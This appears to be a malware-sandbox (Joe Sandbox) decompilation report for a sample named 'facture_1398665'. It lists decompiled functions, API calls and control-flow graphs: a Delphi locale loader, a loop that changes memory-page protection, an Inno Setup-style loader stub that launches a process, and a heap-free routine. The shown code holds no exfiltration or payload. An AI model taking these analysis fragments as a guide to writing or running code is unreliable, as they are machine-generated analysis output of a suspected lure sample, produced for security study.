    0x0040600a
    0x0040601a
    0x0040601f
    0x00406023
    0x00406025
    0x00406033
    0x00406035
    0x00406037
    0x00406039
    0x00406039
    0x00406049
    0x00406059
    0x0040605e
    0x0040605e
    0x00406023
    0x00405fe3
    0x00405fa2
    0x00406067
    0x00000000
    0x00000000
    0x00000000
    0x00405e85
    0x00405e67
    0x00405e49

    APIs
    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,?,00000000), ref: 00405E04
    • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,?,00000000), ref: 00405E24
    • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,?,00000000), ref: 00405E42
    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000), ref: 00405E60
    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 00405E7E
      • Part of subcall function 00405BEC: GetModuleHandleW.KERNEL32(kernel32.dll,00407574,?,00000000), ref: 00405C09
      • Part of subcall function 00405BEC: GetProcAddress.KERNEL32(?,GetLongPathNameW,kernel32.dll,00407574,?,00000000), ref: 00405C20
      • Part of subcall function 00405BEC: lstrcpynW.KERNEL32(?,?,?), ref: 00405C50
      • Part of subcall function 00405BEC: lstrcpynW.KERNEL32(?,?,?,kernel32.dll,00407574,?,00000000), ref: 00405CBF
      • Part of subcall function 00405BEC: lstrcpynW.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,00407574,?,00000000), ref: 00405D07
      • Part of subcall function 00405BEC: FindFirstFileW.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,00407574,?,00000000), ref: 00405D1A
      • Part of subcall function 00405BEC: FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,00407574,?,00000000), ref: 00405D30
      • Part of subcall function 00405BEC: lstrlenW.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,00407574,?,00000000), ref: 00405D3C
      • Part of subcall function 00405BEC: lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,00407574,?), ref: 00405D78
      • Part of subcall function 00405BEC: lstrlenW.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,00407574), ref: 00405D84
      • Part of subcall function 00405BEC: lstrcpynW.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 00405DA7
    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00405F1C,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?), ref: 00405EC7
    • RegQueryValueExW.ADVAPI32(?,00406110,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00405F1C,?,80000001), ref: 00405EE5
    • RegCloseKey.ADVAPI32(?,00405F23,00000000,?,?,00000000,00405F1C,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405F16
    • lstrcpynW.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000), ref: 00405F33
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00405F40
    • GetLocaleInfoW.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00405F46
    • lstrlenW.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405F74
    • lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405FCA
    • LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405FDA
    • lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0040600A
    • LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 0040601A
    • lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 00406049
    • LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?), ref: 00406059
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12842280383.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.12842260256.00400000.00000002.sdmp
    • Associated: 00000002.00000002.12842384840.00412000.00000004.sdmp
    • Associated: 00000002.00000002.12842407813.00417000.00000004.sdmp
    • Associated: 00000002.00000002.12842428355.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_facture_1398665.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 110 405f23-405f55 lstrcpynW GetThreadLocale GetLocaleInfoW 111 405f5b-405f60 110->111 112 406060-406067 110->112 113 405f62-405f67 111->113 114 405f6d-405f85 lstrlenW 111->114 113->112 113->114 115 405f8a-405f8e 114->115 116 405f9a-405fa2 115->116 117 405f90-405f98 115->117 116->112 118 405fa8-405fb0 116->118 117->116 119 405f87 117->119 120 405fe1-405fe3 118->120 121 405fb2-405fb8 118->121 119->115 120->112 122 405fe5-405fea 120->122 123 405fbd-405fdf lstrcpynW LoadLibraryExW 121->123 124 405fba 121->124 122->112 125 405fec-405ff8 122->125 123->120 124->123 126 405ffa 125->126 127 405ffd-406023 lstrcpynW LoadLibraryExW 125->127 126->127 127->112 128 406025-406037 127->128 129 406039 128->129 130 40603c-40605e lstrcpynW LoadLibraryExW 128->130 129->130 130->112
    C-Code - Quality: 90%
    			E00405F23() {
    				void* _t32;
    				struct HINSTANCE__* _t39;
    				struct HINSTANCE__* _t46;
    				short* _t57;
    				WCHAR* _t58;
    				signed int _t60;
    				signed int _t61;
    				signed int _t63;
    				signed int _t64;
    				signed int _t66;
    				signed int _t67;
    				struct HINSTANCE__* _t68;
    				void* _t70;
    
    				lstrcpynW(_t70 - 0x22a,  *(_t70 - 4), 0x105);
    				GetLocaleInfoW(GetThreadLocale(), 3, _t70 - 0x12, 5); // executed
    				_t68 = 0;
    				if( *(_t70 - 0x22a) == 0 ||  *(_t70 - 0x12) == 0 &&  *(_t70 - 0x1c) == 0) {
    					L20:
    					return _t68;
    				} else {
    					_t57 = lstrlenW(_t70 - 0x22a) + _t30 + _t70 - 0x22a;
    					L5:
    					if( *_t57 != 0x2e && _t57 != _t70 - 0x22a) {
    						_t57 = _t57 - 2;
    						goto L5;
    					}
    					_t32 = _t70 - 0x22a;
    					if(_t57 != _t32) {
    						_t58 = _t57 + 2;
    						if( *(_t70 - 0x1c) != 0) {
    							_t66 = _t58 - _t32;
    							_t67 = _t66 >> 1;
    							if(_t66 < 0) {
    								asm("adc edx, 0x0");
    							}
    							lstrcpynW(_t58, _t70 - 0x1c, 0x105 - _t67);
    							_t68 = LoadLibraryExW(_t70 - 0x22a, 0, 2);
    						}
    						if(_t68 == 0 &&  *(_t70 - 0x12) != 0) {
    							_t60 = _t58 - _t70 - 0x22a;
    							_t61 = _t60 >> 1;
    							if(_t60 < 0) {
    								asm("adc edx, 0x0");
    							}
    							lstrcpynW(_t58, _t70 - 0x12, 0x105 - _t61);
    							_t39 = LoadLibraryExW(_t70 - 0x22a, 0, 2); // executed
    							_t68 = _t39;
    							if(_t68 == 0) {
    								 *((short*)(_t70 - 0xe)) = 0;
    								_t63 = _t58 - _t70 - 0x22a;
    								_t64 = _t63 >> 1;
    								if(_t63 < 0) {
    									asm("adc edx, 0x0");
    								}
    								lstrcpynW(_t58, _t70 - 0x12, 0x105 - _t64);
    								_t46 = LoadLibraryExW(_t70 - 0x22a, 0, 2); // executed
    								_t68 = _t46;
    							}
    						}
    					}
    					goto L20;
    				}
    			}
















    0x00405f33
    0x00405f46
    0x00405f4b
    0x00405f55
    0x00406060
    0x00406067
    0x00405f6d
    0x00405f83
    0x00405f8a
    0x00405f8e
    0x00405f87
    0x00000000
    0x00405f87
    0x00405f9a
    0x00405fa2
    0x00405fa8
    0x00405fb0
    0x00405fb4
    0x00405fb6
    0x00405fb8
    0x00405fba
    0x00405fba
    0x00405fca
    0x00405fdf
    0x00405fdf
    0x00405fe3
    0x00405ff4
    0x00405ff6
    0x00405ff8
    0x00405ffa
    0x00405ffa
    0x0040600a
    0x0040601a
    0x0040601f
    0x00406023
    0x00406025
    0x00406033
    0x00406035
    0x00406037
    0x00406039
    0x00406039
    0x00406049
    0x00406059
    0x0040605e
    0x0040605e
    0x00406023
    0x00405fe3
    0x00000000
    0x00405fa2

    APIs
    • lstrcpynW.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000), ref: 00405F33
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00405F40
    • GetLocaleInfoW.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00405F46
    • lstrlenW.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405F74
    • lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405FCA
    • LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405FDA
    • lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0040600A
    • LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 0040601A
    • lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 00406049
    • LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?), ref: 00406059
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12842280383.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.12842260256.00400000.00000002.sdmp
    • Associated: 00000002.00000002.12842384840.00412000.00000004.sdmp
    • Associated: 00000002.00000002.12842407813.00417000.00000004.sdmp
    • Associated: 00000002.00000002.12842428355.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_facture_1398665.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 303 40ed40-40ed66 GetSystemInfo VirtualQuery 304 40ed6c 303->304 305 40ee0b-40ee12 303->305 306 40edff-40ee05 304->306 306->305 307 40ed71-40ed78 306->307 308 40ed7a-40ed7e 307->308 309 40edeb-40edfd VirtualQuery 307->309 308->309 310 40ed80-40ed8b 308->310 309->305 309->306 311 40ed8d-40ed90 310->311 312 40ed9c-40edb1 VirtualProtect 310->312 311->312 313 40ed92-40ed95 311->313 314 40edb3 312->314 315 40edb8-40edba 312->315 313->312 317 40ed97-40ed9a 313->317 314->315 316 40edc9-40edcc 315->316 318 40edce-40edd3 316->318 319 40edbc-40edc5 call 40ed38 316->319 317->312 317->315 318->309 320 40edd5-40ede6 VirtualProtect 318->320 319->316 320->309
    C-Code - Quality: 100%
    			E0040ED40(void* __eax) {
    				char _v44;
    				struct _SYSTEM_INFO _v80;
    				long _v84;
    				char _v88;
    				long _t22;
    				void* _t37;
    				struct _MEMORY_BASIC_INFORMATION* _t40;
    				long _t41;
    				void** _t42;
    
    				_t42 =  &(_v80.dwPageSize);
    				 *_t42 = __eax;
    				_t40 =  &_v44;
    				GetSystemInfo( &_v80); // executed
    				_t22 = VirtualQuery( *_t42, _t40, 0x1c);
    				if(_t22 == 0) {
    					L17:
    					return _t22;
    				} else {
    					while(1) {
    						_t22 = _t40->AllocationBase;
    						if(_t22 !=  *_t42) {
    							goto L17;
    						}
    						if(_t40->State != 0x1000 || (_t40->Protect & 0x00000001) != 0) {
    							L15:
    							_t22 = VirtualQuery(_t40->BaseAddress + _t40->RegionSize, _t40, 0x1c);
    							if(_t22 == 0) {
    								goto L17;
    							}
    							continue;
    						} else {
    							_v88 = 0;
    							_t41 = _t40->Protect;
    							if(_t41 == 1 || _t41 == 2 || _t41 == 0x10 || _t41 == 0x20) {
    								if(VirtualProtect(_t40->BaseAddress, _t40->RegionSize, 0x40,  &_v84) != 0) {
    									_v88 = 1;
    								}
    							}
    							_t37 = 0;
    							while(_t37 < _t40->RegionSize) {
    								E0040ED38(_t40->BaseAddress + _t37);
    								_t37 = _t37 + _v80.dwPageSize;
    							}
    							if(_v88 != 0) {
    								VirtualProtect( *_t40, _t40->RegionSize, _v84,  &_v84);
    							}
    							goto L15;
    						}
    					}
    					goto L17;
    				}
    			}












    0x0040ed44
    0x0040ed47
    0x0040ed4a
    0x0040ed53
    0x0040ed5f
    0x0040ed66
    0x0040ee12
    0x0040ee12
    0x0040ed6c
    0x0040edff
    0x0040edff
    0x0040ee05
    0x00000000
    0x00000000
    0x0040ed78
    0x0040edeb
    0x0040edf6
    0x0040edfd
    0x00000000
    0x00000000
    0x00000000
    0x0040ed80
    0x0040ed80
    0x0040ed85
    0x0040ed8b
    0x0040edb1
    0x0040edb3
    0x0040edb3
    0x0040edb1
    0x0040edb8
    0x0040edc9
    0x0040edc0
    0x0040edc5
    0x0040edc5
    0x0040edd3
    0x0040ede6
    0x0040ede6
    0x00000000
    0x0040edd3
    0x0040ed78
    0x00000000
    0x0040edff

    APIs
    • GetSystemInfo.KERNEL32(?), ref: 0040ED53
    • VirtualQuery.KERNEL32(?,?,0000001C,?), ref: 0040ED5F
    • VirtualProtect.KERNEL32(?,?,00000040,0000001C,?,?,0000001C), ref: 0040EDAA
    • VirtualProtect.KERNEL32(?,?,?,0000001C,?,?,00000040,0000001C,?,?,0000001C), ref: 0040EDE6
    • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C,?), ref: 0040EDF6
    Memory Dump Source
    • Source File: 00000002.00000002.12842280383.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.12842260256.00400000.00000002.sdmp
    • Associated: 00000002.00000002.12842384840.00412000.00000004.sdmp
    • Associated: 00000002.00000002.12842407813.00417000.00000004.sdmp
    • Associated: 00000002.00000002.12842428355.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_facture_1398665.jbxd
    C-Code - Quality: 78%
    			E00411C96(long __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
    				intOrPtr _t19;
    				intOrPtr _t21;
    				struct HWND__* _t23;
    				struct HWND__* _t24;
    				struct HWND__* _t27;
    				intOrPtr _t28;
    				intOrPtr _t30;
    				intOrPtr _t38;
    				intOrPtr _t41;
    				int _t42;
    				intOrPtr _t43;
    				intOrPtr _t45;
    				struct HWND__* _t48;
    				intOrPtr _t49;
    				intOrPtr _t52;
    				void* _t55;
    				intOrPtr _t61;
    				intOrPtr _t69;
    				intOrPtr _t70;
    				intOrPtr _t71;
    				void* _t74;
    				void* _t75;
    
    				_t75 = __eflags;
    				_t55 = __ecx;
    				0x1840();
    				SetLastError(__eax);
    				E0040E770(0x69, __ebx, _t55, __esi, _t75);
    				E0040404C();
    				_t19 =  *0x41865c; // 0x1240ef8
    				 *0x41865c = 0;
    				E00403894(_t19);
    				_t21 =  *0x415b48; // 0x400000
    				_t23 = E004068EC(0, L"STATIC", 0, _t21, 0, 0, 0, 0, 0, 0, 0); // executed
    				 *0x412af0 = _t23;
    				_t24 =  *0x412af0; // 0x0
    				 *0x418654 = SetWindowLongW(_t24, 0xfffffffc, E0040EAC4);
    				_t27 =  *0x412af0; // 0x0
    				 *(_t74 - 0x58) = _t27;
    				 *((char*)(_t74 - 0x54)) = 0;
    				_t28 =  *0x418664; // 0x4324c8
    				_t4 = _t28 + 0x20; // 0x1a5fe9
    				 *((intOrPtr*)(_t74 - 0x50)) =  *_t4;
    				 *((char*)(_t74 - 0x4c)) = 0;
    				_t30 =  *0x418664; // 0x4324c8
    				_t7 = _t30 + 0x24; // 0x29a00
    				 *((intOrPtr*)(_t74 - 0x48)) =  *_t7;
    				 *((char*)(_t74 - 0x44)) = 0;
    				E004082D4(L"/SL5=\"$%x,%d,%d,", 2, _t74 - 0x58, _t74 - 0x40);
    				_push( *((intOrPtr*)(_t74 - 0x40)));
    				_push( *0x418658);
    				_push(E00411F5C);
    				E0040B84C(_t74 - 0x5c, __ebx, __esi, _t75);
    				_push( *((intOrPtr*)(_t74 - 0x5c)));
    				E0040513C(_t74 - 0x3c, 4, __edi);
    				_t38 =  *0x418670; // 0x122172c, executed
    				E0040EB50(_t38, __ebx, 0x412aec,  *((intOrPtr*)(_t74 - 0x3c)), __edi, __esi, __fp0); // executed
    				if( *0x412ae8 != 0xffffffff) {
    					_t52 =  *0x412ae8; // 0xffffffff
    					E0040EA2C(_t52, 0x412aec);
    				}
    				_pop(_t69);
    				 *[fs:eax] = _t69;
    				_push(0x411e30);
    				_t41 =  *0x41865c; // 0x1240ef8
    				_t42 = E00403894(_t41);
    				if( *0x418670 != 0) {
    					_t71 =  *0x418670; // 0x122172c
    					_t42 = E0040E5DC(0, _t71, 0xfa, 0x32); // executed
    				}
    				if( *0x418668 != 0) {
    					_t49 =  *0x418668; // 0x11f6b0c
    					_t42 = RemoveDirectoryW(E00404D24(_t49)); // executed
    				}
    				if( *0x412af0 != 0) {
    					_t48 =  *0x412af0; // 0x0
    					_t42 = DestroyWindow(_t48); // executed
    				}
    				if( *0x41864c != 0) {
    					_t43 =  *0x41864c; // 0x125da98
    					_t61 =  *0x418650; // 0x1
    					_t70 =  *0x40dcc4; // 0x40dcc8
    					E00405548(_t43, _t61, _t70);
    					_t45 =  *0x41864c; // 0x125da98
    					E00402E20(_t45);
    					 *0x41864c = 0;
    					return 0;
    				}
    				return _t42;
    			}

























    0x00411c96
    0x00411c96
    0x00411c96
    0x00411c9e
    0x00411ca5
    0x00411caa
    0x00411caf
    0x00411cb6
    0x00411cbc
    0x00411ccf
    0x00411ce3
    0x00411ce8
    0x00411cf4
    0x00411cff
    0x00411d08
    0x00411d0d
    0x00411d10
    0x00411d14
    0x00411d19
    0x00411d1c
    0x00411d1f
    0x00411d23
    0x00411d28
    0x00411d2b
    0x00411d2e
    0x00411d3f
    0x00411d44
    0x00411d47
    0x00411d4d
    0x00411d55
    0x00411d5a
    0x00411d65
    0x00411d72
    0x00411d77
    0x00411d83
    0x00411d85
    0x00411d8a
    0x00411d8a
    0x00411d91
    0x00411d94
    0x00411d97
    0x00411d9c
    0x00411da1
    0x00411dad
    0x00411dbb
    0x00411dc3
    0x00411dc3
    0x00411dcf
    0x00411dd1
    0x00411ddc
    0x00411ddc
    0x00411de8
    0x00411dea
    0x00411df0
    0x00411df0
    0x00411dfc
    0x00411dfe
    0x00411e03
    0x00411e09
    0x00411e0f
    0x00411e14
    0x00411e19
    0x00411e20
    0x00000000
    0x00411e20
    0x00411e25

    APIs
    • SetLastError.KERNEL32(00000000), ref: 00411C9E
      • Part of subcall function 0040E770: GetLastError.KERNEL32(00000000,0040E817,?,?,0122172C), ref: 0040E793
      • Part of subcall function 004068EC: CreateWindowExW.USER32(00000000,STATIC,?,?,?,?,?,?,?,?,?,?), ref: 0040692B
    • SetWindowLongW.USER32(00000000,000000FC,0040EAC4), ref: 00411CFA
      • Part of subcall function 0040B84C: GetCommandLineW.KERNEL32(00000000,0040B88E,?,?,00000000,?,00411D5A,00411F5C,?), ref: 0040B862
      • Part of subcall function 0040EB50: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0040EBC0
      • Part of subcall function 0040EB50: CloseHandle.KERNEL32(00000000), ref: 0040EBD4
      • Part of subcall function 0040EB50: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 0040EBED
      • Part of subcall function 0040EB50: GetExitCodeProcess.KERNEL32(?,00412AEC), ref: 0040EC01
      • Part of subcall function 0040EB50: CloseHandle.KERNEL32(?), ref: 0040EC0A
    • DestroyWindow.USER32(00000000), ref: 00411DF0
      • Part of subcall function 0040E5DC: Sleep.KERNEL32(?,?,?,?,0000000D,?,00411DC8,000000FA,00000032,00411E30), ref: 0040E5FB
      • Part of subcall function 0040E5DC: Sleep.KERNEL32(?,?,?,?,0000000D,?,00411DC8,000000FA,00000032,00411E30), ref: 0040E60B
      • Part of subcall function 0040E5DC: GetLastError.KERNEL32(?,?,?,0000000D,?,00411DC8,000000FA,00000032,00411E30), ref: 0040E61E
      • Part of subcall function 0040E5DC: GetLastError.KERNEL32(?,?,?,0000000D,?,00411DC8,000000FA,00000032,00411E30), ref: 0040E628
    • RemoveDirectoryW.KERNEL32(00000000,00411E30,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411DDC
    Strings
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 91%
    			E00401C7C(void* __eax, signed int __edi, void* __ebp) {
    				struct _MEMORY_BASIC_INFORMATION _v44;
    				void* _v48;
    				signed int __ebx;
    				void* _t58;
    				signed int _t61;
    				int _t65;
    				signed int _t67;
    				void _t70;
    				int _t71;
    				signed int _t78;
    				void* _t79;
    				signed int _t81;
    				intOrPtr _t82;
    				signed int _t87;
    				signed int _t88;
    				signed int _t89;
    				signed int _t92;
    				void* _t96;
    				signed int _t99;
    				void* _t103;
    				intOrPtr _t104;
    				void* _t106;
    				void* _t108;
    				signed int _t113;
    				void* _t115;
    				void* _t116;
    
    				_t56 = __eax;
    				_t89 =  *(__eax - 4);
    				_t78 =  *0x41304d; // 0x0
    				if((_t89 & 0x00000007) != 0) {
    					__eflags = _t89 & 0x00000005;
    					if((_t89 & 0x00000005) != 0) {
    						_pop(_t78);
    						__eflags = _t89 & 0x00000003;
    						if((_t89 & 0x00000003) == 0) {
    							_push(_t78);
    							_push(__edi);
    							_t116 = _t115 + 0xffffffdc;
    							_t103 = __eax - 0x10;
    							E0040165C();
    							_t58 = _t103;
    							 *_t116 =  *_t58;
    							_v48 =  *((intOrPtr*)(_t58 + 4));
    							_t92 =  *(_t58 + 0xc);
    							if((_t92 & 0x00000008) != 0) {
    								_t79 = _t103;
    								_t113 = _t92 & 0xfffffff0;
    								_t99 = 0;
    								__eflags = 0;
    								while(1) {
    									VirtualQuery(_t79,  &_v44, 0x1c);
    									_t61 = VirtualFree(_t79, 0, 0x8000);
    									__eflags = _t61;
    									if(_t61 == 0) {
    										_t99 = _t99 | 0xffffffff;
    										goto L10;
    									}
    									_t104 = _v44.RegionSize;
    									__eflags = _t113 - _t104;
    									if(_t113 > _t104) {
    										_t113 = _t113 - _t104;
    										_t79 = _t79 + _t104;
    										continue;
    									}
    									goto L10;
    								}
    							} else {
    								_t65 = VirtualFree(_t103, 0, 0x8000); // executed
    								if(_t65 == 0) {
    									_t99 = __edi | 0xffffffff;
    								} else {
    									_t99 = 0;
    								}
    							}
    							L10:
    							if(_t99 == 0) {
    								 *_v48 =  *_t116;
    								 *( *_t116 + 4) = _v48;
    							}
    							 *0x415ac4 = 0;
    							return _t99;
    						} else {
    							return 0xffffffff;
    						}
    					} else {
    						goto L31;
    					}
    				} else {
    					__eflags = __bl;
    					__ebx =  *__edx;
    					if(__eflags != 0) {
    						while(1) {
    							__eax = 0x100;
    							asm("lock cmpxchg [ebx], ah");
    							if(__eflags == 0) {
    								goto L14;
    							}
    							asm("pause");
    							__eflags =  *0x4138d5;
    							if(__eflags != 0) {
    								continue;
    							} else {
    								Sleep(0);
    								__edx = __edx;
    								__ecx = __ecx;
    								__eax = 0x100;
    								asm("lock cmpxchg [ebx], ah");
    								if(__eflags != 0) {
    									Sleep(0xa);
    									__edx = __edx;
    									__ecx = __ecx;
    									continue;
    								}
    							}
    							goto L14;
    						}
    					}
    					L14:
    					_t14 = __edx + 0xc;
    					 *_t14 =  *(__edx + 0xc) - 1;
    					__eflags =  *_t14;
    					__eax =  *(__edx + 8);
    					if( *_t14 == 0) {
    						__eflags = __eax;
    						if(__eax == 0) {
    							L20:
    							 *(__ebx + 0xc) = __eax;
    						} else {
    							__eax =  *(__edx + 0x14);
    							__ecx =  *(__edx + 4);
    							 *(__eax + 4) = __ecx;
    							 *(__ecx + 0x14) = __eax;
    							__eax = 0;
    							__eflags =  *((intOrPtr*)(__ebx + 0x10)) - __edx;
    							if( *((intOrPtr*)(__ebx + 0x10)) == __edx) {
    								goto L20;
    							}
    						}
    						 *__ebx = __al;
    						__eax = __edx;
    						__edx =  *(__edx - 4);
    						__bl =  *0x41304d; // 0x0
    						L31:
    						__eflags = _t78;
    						_t81 = _t89 & 0xfffffff0;
    						_push(_t101);
    						_t106 = _t56;
    						if(__eflags != 0) {
    							while(1) {
    								_t67 = 0x100;
    								asm("lock cmpxchg [0x413a34], ah");
    								if(__eflags == 0) {
    									goto L32;
    								}
    								asm("pause");
    								__eflags =  *0x4138d5;
    								if(__eflags != 0) {
    									continue;
    								} else {
    									Sleep(0);
    									_t67 = 0x100;
    									asm("lock cmpxchg [0x413a34], ah");
    									if(__eflags != 0) {
    										Sleep(0xa);
    										continue;
    									}
    								}
    								goto L32;
    							}
    						}
    						L32:
    						__eflags = (_t106 - 4)[_t81] & 0x00000001;
    						_t87 = (_t106 - 4)[_t81];
    						if(((_t106 - 4)[_t81] & 0x00000001) != 0) {
    							_t67 = _t81 + _t106;
    							_t88 = _t87 & 0xfffffff0;
    							_t81 = _t81 + _t88;
    							__eflags = _t88 - 0xb30;
    							if(_t88 >= 0xb30) {
    								_t67 = E004014D8(_t67);
    							}
    						} else {
    							_t88 = _t87 | 0x00000008;
    							__eflags = _t88;
    							(_t106 - 4)[_t81] = _t88;
    						}
    						__eflags =  *(_t106 - 4) & 0x00000008;
    						if(( *(_t106 - 4) & 0x00000008) != 0) {
    							_t88 =  *(_t106 - 8);
    							_t106 = _t106 - _t88;
    							_t81 = _t81 + _t88;
    							__eflags = _t88 - 0xb30;
    							if(_t88 >= 0xb30) {
    								_t67 = E004014D8(_t106);
    							}
    						}
    						__eflags = _t81 - 0x13ffe0;
    						if(_t81 == 0x13ffe0) {
    							__eflags =  *0x413a3c - 0x13ffe0;
    							if( *0x413a3c != 0x13ffe0) {
    								_t82 = _t106 + 0x13ffe0;
    								E00401578(_t67);
    								 *((intOrPtr*)(_t82 - 4)) = 2;
    								 *0x413a3c = 0x13ffe0;
    								 *0x413a38 = _t82;
    								 *0x413a34 = 0;
    								__eflags = 0;
    								return 0;
    							} else {
    								_t108 = _t106 - 0x10;
    								_t70 =  *_t108;
    								_t96 =  *(_t108 + 4);
    								 *(_t70 + 4) = _t96;
    								 *_t96 = _t70;
    								 *0x413a34 = 0;
    								_t71 = VirtualFree(_t108, 0, 0x8000);
    								__eflags = _t71 - 1;
    								asm("sbb eax, eax");
    								return _t71;
    							}
    						} else {
    							 *(_t106 - 4) = _t81 + 3;
    							 *(_t106 - 8 + _t81) = _t81;
    							E00401518(_t106, _t88, _t81);
    							 *0x413a34 = 0;
    							__eflags = 0;
    							return 0;
    						}
    					} else {
    						__eflags = __eax;
    						 *(__edx + 8) = __ecx;
    						 *(__ecx - 4) = __eax;
    						if(__eflags == 0) {
    							__ecx =  *(__ebx + 4);
    							 *(__edx + 0x14) = __ebx;
    							 *(__edx + 4) = __ecx;
    							 *(__ecx + 0x14) = __edx;
    							 *(__ebx + 4) = __edx;
    							 *__ebx = 0;
    							__eax = 0;
    							__eflags = 0;
    							_pop(__ebx);
    							return 0;
    						} else {
    							__eax = 0;
    							__eflags = 0;
    							 *__ebx = __al;
    							_pop(__ebx);
    							return 0;
    						}
    					}
    				}
    			}





























